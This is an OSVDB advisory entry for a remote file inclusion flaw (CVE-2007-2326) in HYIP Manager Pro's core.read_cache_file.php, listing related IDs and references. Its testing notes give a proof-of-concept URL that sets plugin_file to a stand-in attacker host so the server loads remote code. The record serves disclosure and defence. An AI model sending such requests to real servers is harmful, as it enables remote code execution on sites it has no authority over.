HYIP Manager Pro /inc/libs/core/core.read_cache_file.php plugin_file Variable Remote File Inclusion

2007-04-25T19:58:23
ID OSVDB:35560
Type osvdb
Reporter OSVDB
Modified 2007-04-25T19:58:23

Description

Manual Testing Notes

http://[target]/inc/libs/core/core.read_cache_file.php?plugin_file=http://[attacker]/?

References:

Related OSVDB ID: 35554
Related OSVDB ID: 35555
Related OSVDB ID: 35558
Related OSVDB ID: 35553
Related OSVDB ID: 35556
Related OSVDB ID: 35557
Related OSVDB ID: 35559
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0426.html
ISS X-Force ID: 33882
CVE-2007-2326
Bugtraq ID: 23663